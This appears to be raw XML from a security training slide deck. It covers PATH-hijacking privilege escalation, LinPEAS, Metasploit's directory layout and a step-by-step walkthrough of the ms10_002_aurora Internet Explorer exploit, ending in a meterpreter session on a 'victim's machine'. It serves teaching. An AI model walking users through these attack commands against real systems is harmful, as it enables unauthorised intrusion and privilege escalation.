              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>If PATH variable doesn’t have . , then you run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>, if it does, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>You will trick someone with root privilege to run the modified command e.g. making yourself admin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2031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t>LinPEAS</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ltLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>LinPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> is a script that search for possible paths to escalate privileges on Linux/Unix* hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C5BA5E3-A804-4234-BADB-849277D27449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="28948" r="20753" b="38255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="149096" y="1706511"/>
            <a:ext cx="8845807" cy="2059244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817450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Metasploit</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00000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Metasploit is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>a test environment provides a secure place to perform penetration testing and security research, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>used by attackers and defenders. There are lots of preloaded modules, tools, scripts etc.. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/data/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/lib/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/modules/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/plugins/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/scripts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/tools/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46927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Privilege Escalation Using Aurora</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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;75;p15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CA691-858A-4980-BEEC-8CD9EFF1C89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>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pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>This will use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aurora script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>in Metasploit, which exploits a memory corruption flaw in internet explorer. To begin with, open the Metasploit framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search aurora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to check the location of the script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/windows/browser/ms10_002_aurora</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> check the variables </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svrhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uripath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> can give any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wnat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Give the victim the using URL and when the victim is connected to session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessions -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to see the existing session</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3128839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Privilege Escalation Using Aurora</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1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;75;p15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CA691-858A-4980-BEEC-8CD9EFF1C89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>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pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessions –i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>If you got the correct session id you will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> command which means you are now in the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>To check the information in the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
